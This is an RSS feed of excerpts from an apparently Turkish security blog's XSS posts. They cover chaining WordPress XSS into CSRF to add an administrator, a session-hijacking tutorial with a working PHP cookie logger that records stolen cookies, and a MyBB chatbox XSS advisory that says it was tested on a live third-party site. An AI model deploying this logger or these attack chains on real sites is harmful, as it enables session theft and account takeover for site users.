<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Xss on diaryofinjector</title><link>https://diaryofinjector.com/tags/xss/</link><description>Recent content in Xss on diaryofinjector</description><generator>Hugo</generator><language>en</language><lastBuildDate>Fri, 30 Mar 2018 00:00:00 +0000</lastBuildDate><atom:link href="https://diaryofinjector.com/tags/xss/index.xml" rel="self" type="application/rss+xml"/><item><title>XSS to CSRF</title><link>https://diaryofinjector.com/posts/xss-to-csrf/</link><pubDate>Fri, 30 Mar 2018 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/xss-to-csrf/</guid><description>&lt;p>Merhaba arkadaşlar bu yazımı wordpress üzerinde anlatacağım. Wordpress üzerindeki basit bir xss&amp;rsquo;i csrf ye dönüştürüp yeni bir yönetici eklemeyi göstereceğim.&lt;/p>
&lt;p>CSRF - CROSS SITE REQUEST FORGERY
(Kullanıcının isteği dışında ve haberi olmadan dışarıdan müdahale)&lt;/p>
&lt;p>Bildiğiniz gibi wordpress&amp;rsquo;in csrf saldırılarına önlem olarak kullanıcı için oluşturduğu bir token vardır ve bu token&amp;rsquo;in sayfadaki input id&amp;rsquo;si &lt;code>_wpnonce&lt;/code>&amp;lsquo;tur. Gelen isteklerde bu token üretilenle uyuşmazsa işlem gerçekleştirilmez. Biz saldırıda wpnonce token&amp;rsquo;ını javascript ile alıp kendi post&amp;rsquo;umuzu yöneticinin haberi olmadan göndereceğiz. Bu istek normal şartlar altında SOP önleminden dolayı yapamayacağımız bir istek ancak burada XSS açığımızdan faydalanacağız. Bu sayede SOP önlemini bypasslamış olacağız.&lt;/p></description></item><item><title>Xss Session Hijacking Uygulama Örneği</title><link>https://diaryofinjector.com/posts/xss-session-hijacking/</link><pubDate>Tue, 24 Oct 2017 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/xss-session-hijacking/</guid><description>&lt;p>Bu yazımızda basit bir iletişim forumundan ek bir güvenlik ve kontrol olmadan veri gönderimini kullanarak Xss Session Hijacking saldırısı düzenlemeyi anlatacağım.&lt;/p>
&lt;p>&lt;img src="1.png" alt="İletişim formu">&lt;/p>
&lt;p>Yukarıda bir iletişim formu var şimdi buradaki inputlara ve textarea&amp;rsquo;ya verileri giriyoruz ve tamperdata,burpsuite gibi araçlarla yakalayıp veriyi değiştireceğiz.&lt;/p>
&lt;p>&lt;img src="2.png" alt="TamperData ile verinin yakalanması">&lt;/p>
&lt;p>Verilerimiz gördüğünüz gibi şimdi bu verilere cookie loglayacağımız için loggerimizin adresini yazıyoruz.&lt;/p>
&lt;p>Php Kodu&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-php" data-lang="php">&lt;span class="line">&lt;span class="cl">&lt;span class="o">&amp;lt;?&lt;/span>&lt;span class="nx">php&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nx">error_reporting&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$cookie&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$_GET&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;cookie&amp;#34;&lt;/span>&lt;span class="p">];&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$date&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nx">date&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;l ds of F Y h:i:s A&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$user_agent&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$_SERVER&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;HTTP_USER_AGENT&amp;#39;&lt;/span>&lt;span class="p">];&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$file&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nx">fopen&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;lob.txt&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s1">&amp;#39;a&amp;#39;&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="c1">// chmod 777 lob.txt
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span>&lt;span class="nx">fwrite&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$file&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s2">&amp;#34;TARIH:&lt;/span>&lt;span class="si">$date&lt;/span>&lt;span class="s2"> || USER AGENT:&lt;/span>&lt;span class="si">$user_agent&lt;/span>&lt;span class="s2"> || COOKIE:&lt;/span>&lt;span class="si">$cookie&lt;/span>&lt;span class="s2"> &lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nx">fclose&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$file&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="cp">?&amp;gt;&lt;/span>&lt;span class="err">
&lt;/span>&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Javascript Kodu&lt;/p></description></item><item><title>MyBB ChangUonDyu Chatbox XSS</title><link>https://diaryofinjector.com/posts/mybb-chatbox-xss/</link><pubDate>Mon, 10 Nov 2014 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/mybb-chatbox-xss/</guid><description>&lt;p>&lt;strong>Versions Affected&lt;/strong>: I.D.K.(never tested but works on the latest one)&lt;/p>
&lt;p>&lt;strong>Vulnerable file:&lt;/strong>&lt;/p>
&lt;p>&amp;ldquo;&lt;strong>chatbox/message.php&lt;/strong>&amp;rdquo;&lt;/p>
&lt;p>on lines&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-php" data-lang="php">&lt;span class="line">&lt;span class="cl">&lt;span class="mi">54&lt;/span>&lt;span class="o">:&lt;/span> &lt;span class="nv">$shout&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;color&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">strip_tags&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$shout&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;color&amp;#39;&lt;/span>&lt;span class="p">]);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">55&lt;/span>&lt;span class="o">:&lt;/span> &lt;span class="nv">$shout&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;font&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">strip_tags&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$shout&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;font&amp;#39;&lt;/span>&lt;span class="p">]);&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>U shall use &lt;code>htmlspecialchars($shout['color'],ENT_QUOTES);&lt;/code> or similar instead of &lt;strong>strip_tags()&lt;/strong>. Strip_tags just blocks html tags, doesnt do anything for quotation marks. That is why it was named &lt;strong>&amp;ldquo;strip_tags&amp;rdquo;&lt;/strong> ;)&lt;/p>
&lt;p>&lt;strong>Tested on madleets.com;&lt;/strong>&lt;/p>
&lt;p>&lt;strong>Sorry guys dont take it personal ;)&lt;/strong>&lt;/p>
&lt;p>&lt;strong>Example attack:&lt;/strong>
Send a message on chatbox with editing selected font value like this(you can use inspect element options on browsers):&lt;/p></description></item><item><title>XSS Açıkları ve Kullanma Yöntemleri</title><link>https://diaryofinjector.com/posts/xss-aciklari/</link><pubDate>Wed, 06 Aug 2014 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/xss-aciklari/</guid><description>&lt;p>Bu yazıda &lt;strong>XSS&lt;/strong> (&lt;strong>Cross Site Scripting - Çapraz Siteden Betik Çalıştırma&lt;/strong>) saldırılarının kullanımından bahsedeceğim. Bulma yöntemlerini az çok biliyorsunuzdur zaten.&lt;/p>
&lt;p>Bu açık türü de nerdeyse tüm web application açık türleri gibi, &lt;strong>Input Validation&lt;/strong> eksikliğinden kaynaklanır.&lt;/p>
&lt;p>Yani dışarıdan kullanıcının girebildiği parametrelerin filtrelenmemesinden kaynaklanır. Bildiğiniz gibi sql injection da bu sebeple ortaya çıkmaktadır. Ama bu saldırı türünde sayfada &amp;ldquo;&lt;strong>html&lt;/strong>&amp;rdquo; veya &amp;ldquo;&lt;strong>javascript&lt;/strong>&amp;rdquo; kodları çalıştırmak mümkündür.&lt;/p>
&lt;p>&lt;strong>Açığa sebebiyet verecek karakterler&lt;/strong> webmasterın sayfayı kodlarken ne şekilde kodladığına göre değişir ancak en yaygınları ( &lt;code>&amp;quot;&lt;/code> , &lt;code>'&lt;/code> , &lt;code>&amp;lt;&lt;/code> , &lt;code>&amp;gt;&lt;/code> ) karakterleridir.&lt;/p></description></item></channel></rss>